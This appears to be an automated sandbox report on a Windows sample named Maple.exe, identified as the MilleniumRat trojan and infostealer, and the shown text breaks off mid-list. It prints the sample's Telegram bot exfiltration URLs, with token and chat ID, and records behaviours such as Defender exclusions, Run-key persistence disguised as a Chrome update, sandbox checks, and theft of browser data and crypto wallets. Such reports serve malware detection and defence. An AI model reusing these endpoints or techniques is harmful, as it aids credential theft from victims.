Analysis
-
max time kernel
451s -
max time network
547s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
21-07-2024 21:24
Behavioral task
behavioral1
Sample
maple/Maple.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral2
Sample
maple/crack.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral3
Sample
maple/loader.exe
Resource
win10v2004-20240709-en
General
-
Target
maple/Maple.exe
-
Size
74.8MB
-
MD5
87dbbc1ff26b8f7e5cbe56b8f7d4d406
-
SHA1
c731816d542d527c25b0ce6269a573b8eb486e9b
-
SHA256
f7821841c7f10c253f9e34f91e38cea853244afc0103561647598c707ff26742
-
SHA512
2196b39219865c2efd75fa678b0e4723951a2a2f48094c410ddcff4b9ef59e35cb946788487130085f77826868abfe3e7c35cbb80389c3e4d59adedce860086c
-
SSDEEP
1572864:Aps9Fnab4+6DQSc6JUCSi0HTq1/3LmSGnxnkqbHbcT7IMpeQW/0FKAGCYK:wzx6cSgC0HMVGnDbHbc5peu9GCYK
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0%20kb
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
-
Suspicious use of NtCreateProcessExOtherParentProcess 10 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exesvchost.exeWerFault.exedescription pid process target process PID 9860 created 7032 9860 WerFault.exe chrome.exe PID 6616 created 6280 6616 WerFault.exe chrome.exe PID 6948 created 1272 6948 WerFault.exe chrome.exe PID 6304 created 6504 6304 svchost.exe chrome.exe PID 6304 created 5568 6304 svchost.exe msedge.exe PID 6304 created 5568 6304 svchost.exe msedge.exe PID 6304 created 5568 6304 svchost.exe msedge.exe PID 7660 created 9456 7660 WerFault.exe msedge.exe PID 6304 created 8688 6304 svchost.exe msedge.exe PID 6304 created 8652 6304 svchost.exe msedge.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 18 IoCs
Processes:
setup.exeupdater.exesvchost.exedescription pid process target process PID 5560 created 3448 5560 setup.exe Explorer.EXE PID 5560 created 3448 5560 setup.exe Explorer.EXE PID 5560 created 3448 5560 setup.exe Explorer.EXE PID 5560 created 3448 5560 setup.exe Explorer.EXE PID 5560 created 3448 5560 setup.exe Explorer.EXE PID 5560 created 3448 5560 setup.exe Explorer.EXE PID 4908 created 3448 4908 updater.exe Explorer.EXE PID 4908 created 3448 4908 updater.exe Explorer.EXE PID 4908 created 3448 4908 updater.exe Explorer.EXE PID 4908 created 3448 4908 updater.exe Explorer.EXE PID 4908 created 3448 4908 updater.exe Explorer.EXE PID 4908 created 3448 4908 updater.exe Explorer.EXE PID 6304 created 7032 6304 svchost.exe chrome.exe PID 6304 created 1272 6304 svchost.exe chrome.exe PID 6304 created 7032 6304 svchost.exe chrome.exe PID 6304 created 2524 6304 svchost.exe msedge.exe PID 6304 created 5144 6304 svchost.exe msedge.exe PID 6304 created 9456 6304 svchost.exe msedge.exe -
Contacts a large (4704) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 9048 powershell.exe 3252 powershell.exe 4396 powershell.exe 2224 powershell.exe 7424 powershell.exe 1868 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Build.exes.exemain.exeUpdate.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation Build.exe Key value queried \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation s.exe Key value queried \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation main.exe Key value queried \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation Update.exe -
Executes dropped EXE 15 IoCs
Processes:
Build.exehacn.exehacn.exebased.exes.exebased.exemain.exesvchost.exebound.exesetup.exesvchost.exemain.exerar.exeUpdate.exeupdater.exepid process 4304 Build.exe 4532 hacn.exe 4300 hacn.exe 2448 based.exe 4816 s.exe 1424 based.exe 2500 main.exe 2260 svchost.exe 1020 bound.exe 5560 setup.exe 5724 svchost.exe 5228 main.exe 5824 rar.exe 8444 Update.exe 4908 updater.exe -
Loads dropped DLL 64 IoCs
Processes:
Maple.exehacn.exebased.exemain.exesvchost.exemain.exepid process 1768 Maple.exe 1768 Maple.exe 4300 hacn.exe 4300 hacn.exe 1424 based.exe 1424 based.exe 1424 based.exe 1424 based.exe 1424 based.exe 1424 based.exe 1424 based.exe 1424 based.exe 1424 based.exe 1424 based.exe 1424 based.exe 1424 based.exe 1424 based.exe 1424 based.exe 1424 based.exe 1424 based.exe 2500 main.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5724 svchost.exe 5228 main.exe 5228 main.exe 5228 main.exe 5228 main.exe 5228 main.exe 5228 main.exe 5228 main.exe 5228 main.exe 5228 main.exe 5228 main.exe 5228 main.exe 5228 main.exe 5228 main.exe 5228 main.exe 5228 main.exe 5228 main.exe 5228 main.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI8082\python310.dll upx behavioral1/memory/1768-16-0x00007FF9F6530000-0x00007FF9F6996000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI8082\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI8082\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI8082\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI8082\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI8082\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI8082\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI8082\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI8082\libcrypto-1_1.dll upx behavioral1/memory/1424-104-0x00007FF9F53D0000-0x00007FF9F5836000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI24482\_ssl.pyd upx behavioral1/memory/1424-128-0x00007FFA0BCA0000-0x00007FFA0BCAF000-memory.dmp upx behavioral1/memory/1424-127-0x00007FFA034A0000-0x00007FFA034C4000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI24482\_sqlite3.pyd upx behavioral1/memory/1424-134-0x00007FFA02550000-0x00007FFA0257C000-memory.dmp upx behavioral1/memory/1424-137-0x00007FFA041C0000-0x00007FFA041DF000-memory.dmp upx behavioral1/memory/1424-136-0x00007FFA05C70000-0x00007FFA05C88000-memory.dmp upx behavioral1/memory/1424-141-0x00007FF9F5BB0000-0x00007FF9F5D2A000-memory.dmp upx behavioral1/memory/1424-151-0x00007FF9F4F30000-0x00007FF9F5048000-memory.dmp upx behavioral1/memory/1424-150-0x00007FFA06020000-0x00007FFA0602D000-memory.dmp upx behavioral1/memory/1424-149-0x00007FFA00EF0000-0x00007FFA00F05000-memory.dmp upx behavioral1/memory/1424-148-0x00007FF9F5AF0000-0x00007FF9F5BA8000-memory.dmp upx behavioral1/memory/1424-147-0x00007FF9F5050000-0x00007FF9F53C9000-memory.dmp upx behavioral1/memory/1424-144-0x00007FF9FCED0000-0x00007FF9FCEFE000-memory.dmp upx behavioral1/memory/1424-143-0x00007FFA06050000-0x00007FFA0605D000-memory.dmp upx behavioral1/memory/1424-142-0x00007FFA00F10000-0x00007FFA00F29000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI24482\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI24482\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI24482\libssl-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI24482\libffi-7.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI24482\_ctypes.pyd upx behavioral1/memory/1424-4310-0x00007FF9F53D0000-0x00007FF9F5836000-memory.dmp upx behavioral1/memory/1424-4363-0x00007FFA034A0000-0x00007FFA034C4000-memory.dmp upx behavioral1/memory/1424-4481-0x00007FF9F5050000-0x00007FF9F53C9000-memory.dmp upx behavioral1/memory/1424-4480-0x00007FFA06020000-0x00007FFA0602D000-memory.dmp upx behavioral1/memory/1424-4479-0x00007FFA00EF0000-0x00007FFA00F05000-memory.dmp upx behavioral1/memory/1424-4478-0x00007FF9F5AF0000-0x00007FF9F5BA8000-memory.dmp upx behavioral1/memory/1424-4477-0x00007FF9F4F30000-0x00007FF9F5048000-memory.dmp upx behavioral1/memory/1424-4476-0x00007FF9FCED0000-0x00007FF9FCEFE000-memory.dmp upx behavioral1/memory/1424-4475-0x00007FFA06050000-0x00007FFA0605D000-memory.dmp upx behavioral1/memory/1424-4474-0x00007FFA00F10000-0x00007FFA00F29000-memory.dmp upx behavioral1/memory/1424-4473-0x00007FF9F5BB0000-0x00007FF9F5D2A000-memory.dmp upx behavioral1/memory/1424-4472-0x00007FFA041C0000-0x00007FFA041DF000-memory.dmp upx behavioral1/memory/1424-4471-0x00007FFA05C70000-0x00007FFA05C88000-memory.dmp upx behavioral1/memory/1424-4470-0x00007FFA02550000-0x00007FFA0257C000-memory.dmp upx behavioral1/memory/1424-4469-0x00007FFA0BCA0000-0x00007FFA0BCAF000-memory.dmp upx behavioral1/memory/1424-4468-0x00007FFA034A0000-0x00007FFA034C4000-memory.dmp upx behavioral1/memory/1424-4467-0x00007FF9F53D0000-0x00007FF9F5836000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
svchost.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\кокершмидт = "C:\\ProgramData\\svchost.exe" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe" reg.exe -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
Processes:
flow ioc 33 raw.githubusercontent.com 35 raw.githubusercontent.com 37 raw.githubusercontent.com 90 raw.githubusercontent.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 27 ip-api.com 44 api.ipify.org 45 api.ipify.org -
Drops file in System32 directory 12 IoCs
Processes:
powershell.exesvchost.exeOfficeClickToRun.exesvchost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
svchost.exepid process 5724 svchost.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
setup.exeupdater.exedescription pid process target process PID 5560 set thread context of 9940 5560 setup.exe dialer.exe PID 4908 set thread context of 9520 4908 updater.exe dialer.exe PID 4908 set thread context of 9488 4908 updater.exe dialer.exe PID 4908 set thread context of 9700 4908 updater.exe dialer.exe -
Drops file in Program Files directory 1 IoCs
Processes:
setup.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe setup.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 9392 sc.exe 9268 sc.exe 3652 sc.exe 7664 sc.exe 2004 sc.exe 6048 sc.exe 9352 sc.exe 7652 sc.exe 4532 sc.exe 2768 sc.exe -
Detects Pyinstaller 2 IoCs
Processes:
resource yara_rule C:\ProgramData\Microsoft\hacn.exe pyinstaller C:\ProgramData\svchost.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 37 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exewerfault.exewerfault.exefirefox.exeUpdate.exewmiprvse.exewerfault.exefirefox.exewerfault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString werfault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString werfault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Update.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz werfault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 werfault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 werfault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString werfault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz werfault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 werfault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz werfault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 werfault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString werfault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz werfault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 7208 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 1376 tasklist.exe 9912 tasklist.exe 1540 tasklist.exe 4864 tasklist.exe -
Enumerates system info in registry 2 TTPs 24 IoCs
Processes:
WerFault.exewerfault.exemsedge.exemsedge.exewerfault.exechrome.exeWerFault.exewerfault.exewerfault.exeWerFault.exewmiprvse.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU werfault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS werfault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU werfault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU werfault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS werfault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU werfault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS werfault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS werfault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exesvchost.exelsass.exeOfficeClickToRun.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={9787B6E1-4DD6-4DB6-83EA-F9073F93AEB1}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created 